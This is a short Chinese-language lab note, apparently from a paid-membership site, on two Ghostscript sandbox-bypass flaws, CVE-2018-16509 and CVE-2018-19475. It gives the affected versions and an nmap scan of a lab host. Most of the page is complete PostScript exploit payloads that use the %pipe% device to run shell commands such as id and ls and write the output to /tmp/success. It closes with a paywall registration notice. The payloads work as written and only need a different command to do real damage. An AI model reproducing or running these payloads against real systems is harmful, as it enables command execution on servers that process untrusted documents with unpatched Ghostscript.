Close

28 6 月, 2024

(CVE-2018-16509)(CVE-2018-19475)

GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-16509)

影响范围:Ghostscript 9.25 版本以前的所有版本

信息收集:nmap 192.168.85.130 -p 8080 -A

%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%ls > /tmp/success && cat /tmp/success) currentdevice putdeviceprops
%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%id > /tmp/success && cat /tmp/success) currentdevice putdeviceprops

GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-19475)

影响范围:Ghostscript 9.25 版本以前的所有版本。

信息收集:nmap 192.168.85.130 -p 8080 -sV

%!PS
0 1 300367 {} for
{save restore} stopped {} if
(%pipe%id > /tmp/success && cat /tmp/success) (w) file

您需要 才能查看所有内容 ,注册请联系客服, 请点这里帮助注册,注册费180